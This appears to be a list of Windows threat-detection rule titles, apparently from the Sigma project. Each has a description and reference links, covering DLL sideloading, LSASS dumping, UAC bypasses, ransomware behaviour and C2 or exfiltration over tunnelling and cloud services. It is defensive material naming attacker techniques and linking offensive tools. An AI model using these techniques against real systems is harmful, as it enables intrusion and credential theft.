Suspicious Appended Extension Detects file renames where the target filename uses an uncommon double extension. Could indicate potential ransomware activity renaming files and adding a custom extension to the encrypted files, such as ".jpg.crypted", ".docx.locky", etc. https://app.any.run/tasks/d66ead5a-faf4-4437-93aa-65785afaf9e5/, https://blog.cyble.com/2022/08/10/onyx-ransomware-renames-its-leak-site-to-vsop/
Amsi.DLL Loaded Via LOLBIN Process Detects loading of "Amsi.dll" by a living-off-the-land process. This could be an indication of a "PowerShell without PowerShell" attack Internal Research, https://www.paloaltonetworks.com/blog/security-operations/stopping-powershell-without-powershell/
Potential Azure Browser SSO Abuse Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD account) wanting to perform SSO authentication in the browser. An attacker can use this to authenticate to Azure AD in a browser as that user. https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30
Suspicious Renamed Comsvcs DLL Loaded By Rundll32 Detects rundll32 loading a renamed comsvcs.dll to dump process memory https://twitter.com/sbousseaden/status/1555200155351228419
CredUI.DLL Loaded By Uncommon Process Detects loading of "credui.dll" and related DLLs by an uncommon process. Attackers might leverage this DLL for potential use of "CredUIPromptForCredentials" or "CredUnPackAuthenticationBufferW". https://securitydatasets.com/notebooks/atomic/windows/credential_access/SDWIN-201020013208.html, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md#atomic-test-2---powershell---prompt-user-for-password, https://learn.microsoft.com/en-us/windows/win32/api/wincred/nf-wincred-creduipromptforcredentialsa, https://github.com/S12cybersecurity/RDPCredentialStealer
Suspicious Unsigned Dbghelp/Dbgcore DLL Loaded Detects the load of the dbghelp/dbgcore DLLs (used to make memory dumps) by suspicious processes. Tools like ProcessHacker and some attacker tradecraft use the MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll. As an example, the SILENTTRINITY C2 framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine. https://learn.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump, https://www.pinvoke.net/default.aspx/dbghelp/MiniDumpWriteDump.html, https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6
PCRE.NET Package Image Load Detects processes loading modules related to PCRE.NET package https://twitter.com/rbmaslen/status/1321859647091970051, https://twitter.com/tifkin_/status/1321916444557365248
Load Of RstrtMgr.DLL By A Suspicious Process Detects the load of RstrtMgr DLL (Restart Manager) by a suspicious process. This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking files (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows. It could also be used for anti-analysis purposes by shutting down specific processes. https://www.crowdstrike.com/blog/windows-restart-manager-part-1/, https://www.crowdstrike.com/blog/windows-restart-manager-part-2/, https://web.archive.org/web/20231221193106/https://www.swascan.com/cactus-ransomware-malware-analysis/, https://taiwan.postsen.com/business/88601/Hamas-hackers-use-data-destruction-software-BiBi-which-consumes-a-lot-of-processor-resources-to-wipe-Windows-computer-data--iThome.html
Load Of RstrtMgr.DLL By An Uncommon Process Detects the load of RstrtMgr DLL (Restart Manager) by an uncommon process. This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking files (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows. It could also be used for anti-analysis purposes by shutting down specific processes. https://www.crowdstrike.com/blog/windows-restart-manager-part-1/, https://www.crowdstrike.com/blog/windows-restart-manager-part-2/, https://web.archive.org/web/20231221193106/https://www.swascan.com/cactus-ransomware-malware-analysis/, https://taiwan.postsen.com/business/88601/Hamas-hackers-use-data-destruction-software-BiBi-which-consumes-a-lot-of-processor-resources-to-wipe-Windows-computer-data--iThome.html
Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE Detects both the CVE-2022-30190 (Follina) and DogWalk vulnerabilities, which exploit the msdt.exe binary to load the "sdiageng.dll" library https://www.securonix.com/blog/detecting-microsoft-msdt-dogwalk/
Time Travel Debugging Utility Usage - Image Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe. https://lolbas-project.github.io/lolbas/Binaries/Tttracer/, https://twitter.com/mattifestation/status/1196390321783025666, https://twitter.com/oulusoyum/status/1191329746069655553
PowerShell Core DLL Loaded By Non PowerShell Process Detects loading of essential DLLs used by PowerShell by a non-PowerShell process. Detects behavior similar to meterpreter's "load powershell" extension. https://adsecurity.org/?p=2921, https://github.com/p3nt4/PowerShdll
Suspicious Volume Shadow Copy Vssapi.dll Load Detects the image load of VSS DLL by uncommon executables https://github.com/ORCx41/DeleteShadowCopies
Potentially Suspicious Volume Shadow Copy Vsstrace.dll Load Detects the image load of VSS DLL by uncommon executables https://github.com/ORCx41/DeleteShadowCopies
Suspicious Volume Shadow Copy VSS_PS.dll Load Detects the image load of vss_ps.dll by uncommon executables https://www.virustotal.com/gui/file/ba88ca45589fae0139a40ca27738a8fc2dfbe1be5a64a9558f4e0f52b35c5add, https://twitter.com/am0nsec/status/1412232114980982787
HackTool - SILENTTRINITY Stager DLL Load Detects SILENTTRINITY stager dll loading activity https://github.com/byt3bl33d3r/SILENTTRINITY
HackTool - SharpEvtMute DLL Load Detects the load of EvtMuteHook.dll, a key component of SharpEvtHook, a tool that tampers with the Windows event logs https://github.com/bats3c/EvtMute
Potential DCOM InternetExplorer.Application DLL Hijack - Image Load Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class https://threathunterplaybook.com/hunts/windows/201009-RemoteDCOMIErtUtilDLLHijack/notebook.html
Unsigned Image Loaded Into LSASS Process Detects the loading of an unsigned image (DLL, EXE) into the LSASS process https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
CLR DLL Loaded Via Office Applications Detects CLR DLL being loaded by an Office Product https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16
DotNET Assembly DLL Loaded Via Office Application Detects any assembly DLL being loaded by an Office Product https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16
Active Directory Parsing DLL Loaded Via Office Application Detects DSParse DLL being loaded by an Office Product https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16
GAC DLL Loaded Via Office Applications Detects any GAC DLL being loaded by an Office Product https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16
Microsoft Excel Add-In Loaded From Uncommon Location Detects Microsoft Excel loading an Add-In (.xll) file from an uncommon location https://www.mandiant.com/resources/blog/lnk-between-browsers, https://wazuh.com/blog/detecting-xll-files-used-for-dropping-fin7-jssloader-with-wazuh/
Active Directory Kerberos DLL Loaded Via Office Application Detects Kerberos DLL being loaded by an Office Product https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16
Microsoft VBA For Outlook Addin Loaded Via Outlook Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=58
VBA DLL Loaded Via Office Application Detects VB DLLs loaded by an Office application, which could indicate the presence of VBA macros. https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16
PowerShell Core DLL Loaded Via Office Application Detects PowerShell core DLL being loaded by an Office Product Internal Research
Remote DLL Load Via Rundll32.EXE Detects a remote DLL load event via "rundll32.exe". https://github.com/gabe-k/themebleed, Internal Research
WMI ActiveScriptEventConsumers Activity Via Scrcons.EXE DLL Load Detects signs of the WMI script host process "scrcons.exe" loading scripting DLLs, which could indicate WMI ActiveScriptEventConsumers activity. https://twitter.com/HunterPlaybook/status/1301207718355759107, https://www.mdsec.co.uk/2020/09/i-like-to-move-it-windows-lateral-movement-part-1-wmi-event-subscription/, https://threathunterplaybook.com/hunts/windows/200902-RemoteWMIActiveScriptEventConsumers/notebook.html
Potential 7za.DLL Sideloading Detects potential DLL sideloading of "7za.dll" https://www.gov.pl/attachment/ee91f24d-3e67-436d-aa50-7fa56acf789d
Abusable DLL Potential Sideloading From Suspicious Location Detects potential DLL sideloading of DLLs that are known to be abused from suspicious locations https://www.trendmicro.com/en_us/research/23/f/behind-the-scenes-unveiling-the-hidden-workings-of-earth-preta.html, https://research.checkpoint.com/2023/beyond-the-horizon-traveling-the-world-on-camaro-dragons-usb-flash-drives/
Potential Antivirus Software DLL Sideloading Detects potential DLL sideloading of DLLs that are part of antivirus software such as McAfee, Symantec, etc. https://hijacklibs.net/
Potential appverifUI.DLL Sideloading Detects potential DLL sideloading of "appverifUI.dll" https://web.archive.org/web/20220519091349/https://fatrodzianko.com/2020/02/15/dll-side-loading-appverif-exe/
Aruba Network Service Potential DLL Sideloading Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access "arubanetsvc.exe" process using DLL Search Order Hijacking https://twitter.com/wdormann/status/1616581559892545537?t=XLCBO9BziGzD7Bmbt8oMEQ&s=09
Potential AVKkid.DLL Sideloading Detects potential DLL sideloading of "AVKkid.dll" https://research.checkpoint.com/2023/beyond-the-horizon-traveling-the-world-on-camaro-dragons-usb-flash-drives/
Potential CCleanerDU.DLL Sideloading Detects potential DLL sideloading of "CCleanerDU.dll" https://lab52.io/blog/2344-2/
Potential CCleanerReactivator.DLL Sideloading Detects potential DLL sideloading of "CCleanerReactivator.dll" https://lab52.io/blog/2344-2/
Potential Chrome Frame Helper DLL Sideloading Detects potential DLL sideloading of "chrome_frame_helper.dll" https://hijacklibs.net/entries/3rd_party/google/chrome_frame_helper.html
Potential DLL Sideloading Via ClassicExplorer32.dll Detects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software https://blogs.blackberry.com/en/2022/12/mustang-panda-uses-the-russian-ukrainian-war-to-attack-europe-and-asia-pacific-targets, https://app.any.run/tasks/6d8cabb0-dcda-44b6-8050-28d6ce281687/
Potential DLL Sideloading Via comctl32.dll Detects potential DLL sideloading using comctl32.dll to obtain system privileges https://github.com/binderlabs/DirCreate2System, https://github.com/sailay1996/awesome_windows_logical_bugs/blob/60cbb23a801f4c3195deac1cc46df27c225c3d07/dir_create2system.txt
Potential DLL Sideloading Using Coregen.exe Detects usage of the "coregen.exe" (Microsoft CoreCLR Native Image Generator) binary to sideload arbitrary DLLs. https://lolbas-project.github.io/lolbas/OtherMSBinaries/Coregen/
Potential DLL Sideloading Of DBGCORE.DLL Detects DLL sideloading of "dbgcore.dll" https://hijacklibs.net/
System Control Panel Item Loaded From Uncommon Location Detects image load events of system control panel items (.cpl) from uncommon or non-system locations which might be the result of sideloading. https://www.hexacorn.com/blog/2024/01/06/1-little-known-secret-of-fondue-exe/, https://www.hexacorn.com/blog/2024/01/01/1-little-known-secret-of-hdwwiz-exe/
Potential DLL Sideloading Of DBGHELP.DLL Detects potential DLL sideloading of "dbghelp.dll" https://hijacklibs.net/
Potential DLL Sideloading Of DbgModel.DLL Detects potential DLL sideloading of "DbgModel.dll" https://hijacklibs.net/entries/microsoft/built-in/dbgmodel.html
Potential EACore.DLL Sideloading Detects potential DLL sideloading of "EACore.dll" https://research.checkpoint.com/2023/beyond-the-horizon-traveling-the-world-on-camaro-dragons-usb-flash-drives/
Potential Edputil.DLL Sideloading Detects potential DLL sideloading of "edputil.dll" https://alternativeto.net/news/2023/5/cybercriminals-use-wordpad-vulnerability-to-spread-qbot-malware/
Potential System DLL Sideloading From Non System Locations Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64, etc.). https://hijacklibs.net/, https://blog.cyble.com/2022/07/21/qakbot-resurfaces-with-new-playbook/, https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/, https://github.com/XForceIR/SideLoadHunter/blob/cc7ef2e5d8908279b0c4cee4e8b6f85f7b8eed52/SideLoads/README.md, https://www.hexacorn.com/blog/2023/12/26/1-little-known-secret-of-runonce-exe-32-bit/
Potential Goopdate.DLL Sideloading Detects potential DLL sideloading of "goopdate.dll", a DLL used by googleupdate.exe https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf
Potential DLL Sideloading Of Libcurl.DLL Via GUP.EXE Detects potential DLL sideloading of "libcurl.dll" by the "gup.exe" process from an uncommon location https://labs.withsecure.com/publications/fin7-target-veeam-servers
Potential Iviewers.DLL Sideloading Detects potential DLL sideloading of "iviewers.dll" (OLE/COM Object Interface Viewer) https://www.secureworks.com/research/shadowpad-malware-analysis
Potential DLL Sideloading Via JsSchHlp Detects potential DLL sideloading using JUSTSYSTEMS Japanese word processor https://www.welivesecurity.com/2022/12/14/unmasking-mirrorface-operation-liberalface-targeting-japanese-political-entities/, http://www.windowexe.com/bbs/board.php?q=jsschhlp-exe-c-program-files-common-files-justsystem-jsschhlp-jsschhlp
Potential DLL Sideloading Of KeyScramblerIE.DLL Via KeyScrambler.EXE Detects potential DLL side loading of "KeyScramblerIE.dll" by "KeyScrambler.exe". Various threat actors and malware have been found side loading a masqueraded "KeyScramblerIE.dll" through "KeyScrambler.exe". https://thehackernews.com/2024/03/two-chinese-apt-groups-ramp-up-cyber.html, https://csirt-cti.net/2024/02/01/stately-taurus-continued-new-information-on-cyberespionage-attacks-against-myanmar-military-junta/, https://bazaar.abuse.ch/sample/5cb9876681f78d3ee8a01a5aaa5d38b05ec81edc48b09e3865b75c49a2187831/, https://twitter.com/Max_Mal_/status/1775222576639291859, https://twitter.com/DTCERT/status/1712785426895839339
Potential Libvlc.DLL Sideloading Detects potential DLL sideloading of "libvlc.dll", a DLL that is legitimately used by "VLC.exe" https://www.trendmicro.com/en_us/research/23/c/earth-preta-updated-stealthy-strategies.html, https://hijacklibs.net/entries/3rd_party/vlc/libvlc.html
Potential Mfdetours.DLL Sideloading Detects potential DLL sideloading of "mfdetours.dll". While using "mftrace.exe" it can be abused to attach to an arbitrary process and force load any DLL named "mfdetours.dll" from the current directory of execution. Internal Research
Unsigned Mfdetours.DLL Sideloading Detects DLL sideloading of unsigned "mfdetours.dll". Executing "mftrace.exe" can be abused to attach to an arbitrary process and force load any DLL named "mfdetours.dll" from the current directory of execution. Internal Research
Potential DLL Sideloading Of MpSvc.DLL Detects potential DLL sideloading of "MpSvc.dll". https://hijacklibs.net/entries/microsoft/built-in/mpsvc.html
Potential DLL Sideloading Of MsCorSvc.DLL Detects potential DLL sideloading of "mscorsvc.dll". https://hijacklibs.net/entries/microsoft/built-in/mscorsvc.html
Potential DLL Sideloading Of Non-Existent DLLs From System Folders Detects DLL sideloading of system DLLs that are not present on the system by default (at least not in system directories). Usually this technique is used to achieve UAC bypass or privilege escalation. https://decoded.avast.io/martinchlumecky/png-steganography/, https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992, https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/, https://github.com/Wh04m1001/SysmonEoP, https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/, http://remoteawesomethoughts.blogspot.com/2019/05/windows-10-task-schedulerservice.html
Microsoft Office DLL Sideload Detects DLL sideloading of DLLs that are part of Microsoft Office from a non-standard location https://hijacklibs.net/
Potential Python DLL SideLoading Detects potential DLL sideloading of Python DLL files. https://www.securonix.com/blog/seolurker-attack-campaign-uses-seo-poisoning-fake-google-ads-to-install-malware/, https://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/, https://github.com/wietze/HijackLibs/tree/dc9c9f2f94e6872051dab58fbafb043fdd8b4176/yml/3rd_party/python
Potential Rcdll.DLL Sideloading Detects potential DLL sideloading of rcdll.dll https://www.trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html
Potential RjvPlatform.DLL Sideloading From Default Location Detects loading of "RjvPlatform.dll" by the "SystemResetPlatform.exe" binary which can be abused as a method of DLL side loading since the "$SysReset" directory isn't created by default. https://twitter.com/0gtweet/status/1666716511988330499
Potential RjvPlatform.DLL Sideloading From Non-Default Location Detects potential DLL sideloading of "RjvPlatform.dll" by "SystemResetPlatform.exe" located in a non-default location. https://twitter.com/0gtweet/status/1666716511988330499
Potential RoboForm.DLL Sideloading Detects potential DLL sideloading of "roboform.dll", a DLL used by RoboForm Password Manager https://twitter.com/StopMalvertisin/status/1648604148848549888, https://twitter.com/t3ft3lb/status/1656194831830401024, https://www.roboform.com/
Potential ShellDispatch.DLL Sideloading Detects potential DLL sideloading of "ShellDispatch.dll" https://www.hexacorn.com/blog/2023/06/07/this-lolbin-doesnt-exist/
DLL Sideloading Of ShellChromeAPI.DLL Detects processes loading the non-existent DLL "ShellChromeAPI". One known example is the "DeviceEnroller" binary, which in combination with the "PhoneDeepLink" flag tries to load this DLL. Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter. https://mobile.twitter.com/0gtweet/status/1564131230941122561, https://strontic.github.io/xcyclopedia/library/DeviceEnroller.exe-24BEF0D6B0ECED36BB41831759FDE18D.html
Potential SmadHook.DLL Sideloading Detects potential DLL sideloading of "SmadHook.dll", a DLL used by SmadAV antivirus https://research.checkpoint.com/2023/malware-spotlight-camaro-dragons-tinynote-backdoor/, https://www.qurium.org/alerts/targeted-malware-against-crph/
Potential SolidPDFCreator.DLL Sideloading Detects potential DLL sideloading of "SolidPDFCreator.dll" https://lab52.io/blog/new-mustang-pandas-campaing-against-australia/
Third Party Software DLL Sideloading Detects DLL sideloading of DLLs that are part of third-party software (Zoom, Discord, etc.) https://hijacklibs.net/
Fax Service DLL Search Order Hijack The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service. https://windows-internals.com/faxing-your-way-to-system/
Potential Vivaldi_elf.DLL Sideloading Detects potential DLL sideloading of "vivaldi_elf.dll" https://research.checkpoint.com/2023/beyond-the-horizon-traveling-the-world-on-camaro-dragons-usb-flash-drives/
VMGuestLib DLL Sideload Detects DLL sideloading of VMGuestLib.dll by the WmiApSrv service. https://decoded.avast.io/martinchlumecky/png-steganography/
VMMap Signed Dbghelp.DLL Potential Sideloading Detects potential DLL sideloading of a signed dbghelp.dll by the Sysinternals VMMap. https://techcommunity.microsoft.com/t5/sysinternals-blog/zoomit-v7-1-procdump-2-0-for-linux-process-explorer-v17-05/ba-p/3884766
VMMap Unsigned Dbghelp.DLL Potential Sideloading Detects potential DLL sideloading of an unsigned dbghelp.dll by the Sysinternals VMMap. https://techcommunity.microsoft.com/t5/sysinternals-blog/zoomit-v7-1-procdump-2-0-for-linux-process-explorer-v17-05/ba-p/3884766
Potential DLL Sideloading Via VMware Xfer Detects loading of a DLL by the VMware Xfer utility from a non-default directory, which may be an attempt to sideload an arbitrary DLL https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/
Potential Waveedit.DLL Sideloading Detects potential DLL sideloading of "waveedit.dll", which is part of the Nero WaveEditor audio editing software. https://www.trendmicro.com/en_us/research/23/f/behind-the-scenes-unveiling-the-hidden-workings-of-earth-preta.html
Potential Wazuh Security Platform DLL Sideloading Detects potential DLL side loading of DLLs that are part of the Wazuh security platform https://www.trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html
Potential Mpclient.DLL Sideloading Detects potential sideloading of "mpclient.dll" by Windows Defender processes ("MpCmdRun" and "NisSrv") from their non-default directory. https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool
Potential WWlib.DLL Sideloading Detects potential DLL sideloading of "wwlib.dll" https://twitter.com/WhichbufferArda/status/1658829954182774784, https://news.sophos.com/en-us/2022/11/03/family-tree-dll-sideloading-cases-may-be-related/, https://securelist.com/apt-luminousmoth/103332/
Windows Spooler Service Suspicious Binary Load Detects a DLL load from the Spooler Service backup folder https://web.archive.org/web/20210629055600/https://github.com/hhlxf/PrintNightmare/, https://github.com/ly4k/SpoolFool
Unsigned Module Loaded by ClickOnce Application Detects unsigned module load by ClickOnce application. https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5
DLL Load By System Process From Suspicious Locations Detects when a system process (i.e. located in system32, syswow64, etc.) loads a DLL from a suspicious location or a location with permissive permissions such as "C:\Users\Public" https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC (Idea)
Python Image Load By Non-Python Process Detects the image load of "Python Core" by a non-Python process. This might be indicative of a Python script bundled with Py2Exe. https://www.py2exe.org/, https://unit42.paloaltonetworks.com/unit-42-technical-analysis-seaduke/
DotNet CLR DLL Loaded By Scripting Applications Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution. https://github.com/tyranid/DotNetToJScript, https://thewover.github.io/Introducing-Donut/, https://web.archive.org/web/20230329154538/https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html, https://web.archive.org/web/20221026202428/https://gist.github.com/code-scrap/d7f152ffcdb3e0b02f7f394f5187f008
Unsigned DLL Loaded by Windows Utility Detects Windows utilities loading an unsigned or untrusted DLL. Adversaries often abuse those programs to proxy execution of malicious code. https://www.elastic.co/security-labs/Hunting-for-Suspicious-Windows-Libraries-for-Execution-and-Evasion, https://akhere.hashnode.dev/hunting-unsigned-dlls-using-kql, https://unit42.paloaltonetworks.com/unsigned-dlls/?web_view=true
Suspicious Unsigned Thor Scanner Execution Detects loading and execution of an unsigned thor scanner binary. Internal Research
UAC Bypass Using Iscsicpl - ImageLoad Detects the "iscsicpl.exe" UAC bypass technique that leverages DLL Search Order hijacking to load custom DLLs from temp or any user-controlled location in the user's %PATH% https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC, https://twitter.com/wdormann/status/1547583317410607110
UAC Bypass With Fake DLL Attempts to load dismcore.dll after dropping it https://steemit.com/utopian-io/@ah101/uac-bypassing-utility
WMIC Loading Scripting Libraries Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (i.e js, vbs, etc). https://securitydatasets.com/notebooks/atomic/windows/defense_evasion/SDWIN-201017061100.html, https://twitter.com/dez_/status/986614411711442944, https://lolbas-project.github.io/lolbas/Binaries/Wmic/
Wmiprvse Wbemcomn DLL Hijack Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario. https://threathunterplaybook.com/hunts/windows/201009-RemoteWMIWbemcomnDLLHijack/notebook.html
WMI Persistence - Command Line Event Consumer Detects WMI command line event consumers https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/
Suspicious WSMAN Provider Image Loads Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution. https://twitter.com/chadtilbury/status/1275851297770610688, https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/, https://learn.microsoft.com/en-us/windows/win32/winrm/windows-remote-management-architecture, https://github.com/bohops/WSMan-WinRM
Network Connection Initiated By AddinUtil.EXE Detects a network connection initiated by the Add-In deployment cache updating utility "AddInutil.exe". This could indicate a potential command and control communication as this tool doesn't usually initiate network activity. https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html
Uncommon Connection to Active Directory Web Services Detects uncommon network connections to the Active Directory Web Services (ADWS) from processes not typically associated with ADWS management. https://medium.com/falconforce/soaphound-tool-to-collect-active-directory-data-via-adws-165aca78288c, https://github.com/FalconForceTeam/FalconFriday/blob/master/Discovery/ADWS_Connection_from_Unexpected_Binary-Win.md
Uncommon Network Connection Initiated By Certutil.EXE Detects a network connection initiated by the certutil.exe utility. Attackers can abuse the utility in order to download malware or additional payloads. https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil
Outbound Network Connection Initiated By Cmstp.EXE Detects a network connection initiated by Cmstp.EXE. It is uncommon for "cmstp.exe" to initiate an outbound network connection. Investigate the source of such requests to determine if they are malicious. https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/
Outbound Network Connection Initiated By Microsoft Dialer Detects an outbound network connection initiated by Microsoft Dialer. The Microsoft Dialer, also known as Phone Dialer, is a built-in utility application included in various versions of the Microsoft Windows operating system. Its primary function is to provide users with a graphical interface for managing phone calls via a modem or a phone line connected to the computer. In its current context of usage this is an outdated process; it is a common target for info stealers for process injection and is used to make C2 connections, a common example being "Rhadamanthys". https://tria.ge/240301-rk34sagf5x/behavioral2, https://app.any.run/tasks/6720b85b-9c53-4a12-b1dc-73052a78477d, https://research.checkpoint.com/2023/rhadamanthys-v0-5-0-a-deep-dive-into-the-stealers-components/, https://strontic.github.io/xcyclopedia/library/dialer.exe-0B69655F912619756C704A0BF716B61F.html
Network Connection Initiated To AzureWebsites.NET By Non-Browser Process Detects a network connection initiated by a non-browser process on the system to "azurewebsites.net". The latter was often used by threat actors as a malware hosting and exfiltration site. https://www.sentinelone.com/labs/wip26-espionage-threat-actors-abuse-cloud-infrastructure-in-targeted-telco-attacks/, https://symantec-enterprise-blogs.security.com/threat-intelligence/harvester-new-apt-attacks-asia, https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/, https://intezer.com/blog/research/how-we-escaped-docker-in-azure-functions/
Network Connection Initiated To BTunnels Domains Detects network connections to BTunnels domains initiated by a process on the system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine. https://defr0ggy.github.io/research/Utilizing-BTunnel-For-Data-Exfiltration/
Network Connection Initiated To Cloudflared Tunnels Domains Detects network connections to Cloudflared tunnels domains initiated by a process on the system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine. https://defr0ggy.github.io/research/Abusing-Cloudflared-A-Proxy-Service-To-Host-Share-Applications/, https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/, Internal Research
Network Communication With Crypto Mining Pool Detects initiated network connections to crypto mining pools https://www.poolwatch.io/coin/monero, https://github.com/stamparm/maltrail/blob/3ea70459b9559134449423c0a7d8b965ac5c40ea/trails/static/suspicious/crypto_mining.txt, https://www.virustotal.com/gui/search/behaviour_network%253A*.miningocean.org/files
New Connection Initiated To Potential Dead Drop Resolver Domain Detects an executable, which is not an internet browser or known application, initiating network connections to legitimate popular websites that were seen being used as dead drop resolvers in previous attacks. In this context attackers leverage known websites such as "facebook", "youtube", etc. in order to pass through undetected. https://web.archive.org/web/20220830134315/https://content.fireeye.com/apt-41/rpt-apt41/, https://securelist.com/the-tetrade-brazilian-banking-malware/97779/, https://blog.bushidotoken.net/2021/04/dead-drop-resolvers-espionage-inspired.html, https://github.com/kleiton0x00/RedditC2, https://twitter.com/kleiton0x7e/status/1600567316810551296, https://www.linkedin.com/posts/kleiton-kurti_github-kleiton0x00redditc2-abusing-reddit-activity-7009939662462984192-5DbI/?originalSubdomain=al
Network Connection Initiated To DevTunnels Domain Detects network connections to Devtunnels domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine. https://blueteamops.medium.com/detecting-dev-tunnels-16f0994dc3e2, https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/security, https://cydefops.com/devtunnels-unleashed
Suspicious Dropbox API Usage Detects an executable that isn't dropbox but communicates with the Dropbox API https://app.any.run/tasks/7e906adc-9d11-447f-8641-5f40375ecebb, https://www.zscaler.com/blogs/security-research/new-espionage-attack-molerats-apt-targeting-users-middle-east
Suspicious Network Connection to IP Lookup Service APIs Detects external IP address lookups by non-browser processes via services such as "api.ipify.org". This could be indicative of potential post compromise internet test activity. https://github.com/rsp/scripts/blob/c8bb272d68164a9836e4f273d8f924927f39b8c6/externalip-benchmark.md, https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-302a, https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/, https://www.trendmicro.com/en_us/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html
Suspicious Non-Browser Network Communication With Google API Detects a non-browser process interacting with the Google API which could indicate the use of a covert C2 such as Google Sheet C2 (GC2-sheet) https://github.com/looCiprian/GC2-sheet, https://youtu.be/n2dFlSaBBKo, https://services.google.com/fh/files/blogs/gcat_threathorizons_full_apr2023.pdf, https://www.tanium.com/blog/apt41-deploys-google-gc2-for-attacks-cyber-threat-intelligence-roundup/, https://www.bleepingcomputer.com/news/security/hackers-abuse-google-command-and-control-red-team-tool-in-attacks/
Communication To LocaltoNet Tunneling Service Initiated Detects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains. LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet. Attackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls. https://localtonet.com/documents/supported-tunnels, https://cloud.google.com/blog/topics/threat-intelligence/unc3944-targets-saas-applications
Network Connection Initiated To Mega.nz Detects a network connection initiated by a binary to "api.mega.co.nz". Attackers were seen abusing file sharing websites similar to "mega.nz" in order to upload/download additional payloads. https://megatools.megous.com/, https://www.mandiant.com/resources/russian-targeting-gov-business
